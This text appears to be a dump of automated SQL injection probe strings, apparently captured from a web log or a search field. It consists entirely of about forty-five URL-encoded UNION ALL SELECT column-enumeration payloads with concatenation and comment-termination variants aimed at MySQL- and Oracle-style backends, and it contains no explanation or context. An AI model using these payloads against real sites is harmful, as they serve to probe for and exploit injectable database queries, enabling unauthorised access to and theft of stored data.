-9013%22%20WHERE%203087%3D3087%20UNION%20ALL%20SELECT%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087%2C%203087--%20 -1030%27%20%7C%7C%20%28SELECT%203037%20FROM%20DUAL%20WHERE%208898%3D8898%20UNION%20ALL%20SELECT%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898%2C%208898--%20%20%29%20%7C%7C%20%27 -3186%27%20%7C%7C%20%28SELECT%209147%20FROM%20DUAL%20WHERE%206837%3D6837%20UNION%20ALL%20SELECT%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837%2C%206837--%20%20%29%20%7C%7C%20%27 -8759%27%20%7C%7C%20%28SELECT%207598%20FROM%20DUAL%20WHERE%208724%3D8724%20UNION%20ALL%20SELECT%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724--%20%20%29%20%7C%7C%20%27 -8152%27%20%7C%7C%20%28SELECT%201310%20FROM%20DUAL%20WHERE%203381%3D3381%20UNION%20ALL%20SELECT%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381--%20%20%29%20%7C%7C%20%27 -2614%27%20%7C%7C%20%28SELECT%201064%20FROM%20DUAL%20WHERE%209286%3D9286%20UNION%20ALL%20SELECT%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286--%20%20%29%20%7C%7C%20%27 -2503%27%20%7C%7C%20%28SELECT%206102%20FROM%20DUAL%20WHERE%202494%3D2494%20UNION%20ALL%20SELECT%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494%2C%202494--%20%20%29%20%7C%7C%20%27 -4366%27%20%7C%7C%20%28SELECT%203045%20FROM%20DUAL%20WHERE%207922%3D7922%20UNION%20ALL%20SELECT%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922--%20%20%29%20%7C%7C%20%27 -4545%27%20%7C%7C%20%28SELECT%209122%20FROM%20DUAL%20WHERE%209483%3D9483%20UNION%20ALL%20SELECT%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483%2C%209483--%20%20%29%20%7C%7C%20%27 -3478%27%20%7C%7C%20%28SELECT%205711%20FROM%20DUAL%20WHERE%203607%3D3607%20UNION%20ALL%20SELECT%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607%2C%203607--%20%20%29%20%7C%7C%20%27 -3245%27%20%7C%7C%20%28SELECT%203744%20FROM%20DUAL%20WHERE%205105%3D5105%20UNION%20ALL%20SELECT%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105%2C%205105--%20%20%29%20%7C%7C%20%27 -7883%27%20%7C%7C%20%28SELECT%207759%20WHERE%201563%3D1563%20UNION%20ALL%20SELECT%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563%2C%201563--%20%20%29%20%7C%7C%20%27 -3155%27%20%7C%7C%20%28SELECT%201387%20WHERE%202136%3D2136%20UNION%20ALL%20SELECT%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136%2C%202136--%20%20%29%20%7C%7C%20%27 -8675%27%20%7C%7C%20%28SELECT%208990%20WHERE%205288%3D5288%20UNION%20ALL%20SELECT%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288%2C%205288--%20%20%29%20%7C%7C%20%27 -4115%27%20%7C%7C%20%28SELECT%205793%20WHERE%205683%3D5683%20UNION%20ALL%20SELECT%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683--%20%20%29%20%7C%7C%20%27 -1688%27%20%7C%7C%20%28SELECT%205866%20WHERE%206538%3D6538%20UNION%20ALL%20SELECT%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538--%20%20%29%20%7C%7C%20%27 -4291%27%20%7C%7C%20%28SELECT%202461%20WHERE%207798%3D7798%20UNION%20ALL%20SELECT%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798%2C%207798--%20%20%29%20%7C%7C%20%27 -8237%27%20%7C%7C%20%28SELECT%204876%20WHERE%208129%3D8129%20UNION%20ALL%20SELECT%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129--%20%20%29%20%7C%7C%20%27 -5033%27%20%7C%7C%20%28SELECT%203125%20WHERE%205681%3D5681%20UNION%20ALL%20SELECT%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681--%20%20%29%20%7C%7C%20%27 -1611%27%20%7C%7C%20%28SELECT%202111%20WHERE%207668%3D7668%20UNION%20ALL%20SELECT%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668%2C%207668--%20%20%29%20%7C%7C%20%27 -9404%27%20%7C%7C%20%28SELECT%201910%20WHERE%207865%3D7865%20UNION%20ALL%20SELECT%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865--%20%20%29%20%7C%7C%20%27 -7440%20%2B%20%28SELECT%201356%20FROM%20DUAL%20WHERE%201101%3D1101%20UNION%20ALL%20SELECT%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101%2C%201101--%20%20%29 -2259%20%2B%20%28SELECT%207209%20FROM%20DUAL%20WHERE%208504%3D8504%20UNION%20ALL%20SELECT%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504%2C%208504--%20%20%29 -7510%20%2B%20%28SELECT%205132%20FROM%20DUAL%20WHERE%206793%3D6793%20UNION%20ALL%20SELECT%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793%2C%206793--%20%20%29 -5908%20%2B%20%28SELECT%209315%20FROM%20DUAL%20WHERE%208074%3D8074%20UNION%20ALL%20SELECT%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074--%20%20%29 -5491%20%2B%20%28SELECT%202110%20FROM%20DUAL%20WHERE%202013%3D2013%20UNION%20ALL%20SELECT%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013%2C%202013--%20%20%29 -9256%20%2B%20%28SELECT%202758%20FROM%20DUAL%20WHERE%202886%3D2886%20UNION%20ALL%20SELECT%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886%2C%202886--%20%20%29 -2897%20%2B%20%28SELECT%201289%20FROM%20DUAL%20WHERE%209666%3D9666%20UNION%20ALL%20SELECT%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666--%20%20%29 -3576%20%2B%20%28SELECT%206282%20FROM%20DUAL%20WHERE%207393%3D7393%20UNION%20ALL%20SELECT%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393--%20%20%29 -7581%20%2B%20%28SELECT%206734%20FROM%20DUAL%20WHERE%206980%3D6980%20UNION%20ALL%20SELECT%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980%2C%206980--%20%20%29 -7095%20%2B%20%28SELECT%206715%20FROM%20DUAL%20WHERE%208548%3D8548%20UNION%20ALL%20SELECT%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548%2C%208548--%20%20%29 -8979%20%2B%20%28SELECT%205335%20WHERE%206446%3D6446%20UNION%20ALL%20SELECT%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446--%20%20%29 -8325%20%2B%20%28SELECT%203796%20WHERE%207643%3D7643%20UNION%20ALL%20SELECT%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643%2C%207643--%20%20%29 -2565%20%2B%20%28SELECT%203364%20WHERE%206972%3D6972%20UNION%20ALL%20SELECT%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972%2C%206972--%20%20%29 -6735%20%2B%20%28SELECT%202923%20WHERE%207325%3D7325%20UNION%20ALL%20SELECT%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325--%20%20%29 -1591%20%2B%20%28SELECT%205305%20WHERE%201675%3D1675%20UNION%20ALL%20SELECT%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675--%20%20%29 -4072%20%2B%20%28SELECT%206203%20WHERE%203707%3D3707%20UNION%20ALL%20SELECT%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707--%20%20%29 -2192%20%2B%20%28SELECT%203793%20WHERE%202753%3D2753%20UNION%20ALL%20SELECT%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753%2C%202753--%20%20%29 -4303%20%2B%20%28SELECT%204850%20WHERE%205175%3D5175%20UNION%20ALL%20SELECT%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175--%20%20%29 -3419%20%2B%20%28SELECT%209222%20WHERE%209845%3D9845%20UNION%20ALL%20SELECT%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845--%20%20%29 -5706%20%2B%20%28SELECT%202850%20WHERE%201241%3D1241%20UNION%20ALL%20SELECT%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241%2C%201241--%20%20%29 -1158%27%20%2B%20%28SELECT%20%27hHPI%27%20FROM%20DUAL%20WHERE%208818%3D8818%20UNION%20ALL%20SELECT%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818%2C%208818--%20%20%29%20%2B%20%27 -9655%27%20%2B%20%28SELECT%20%27qgKG%27%20FROM%20DUAL%20WHERE%204158%3D4158%20UNION%20ALL%20SELECT%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158--%20%20%29%20%2B%20%27 -7421%27%20%2B%20%28SELECT%20%27sHWC%27%20FROM%20DUAL%20WHERE%205400%3D5400%20UNION%20ALL%20SELECT%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400%2C%205400--%20%20%29%20%2B%20%27 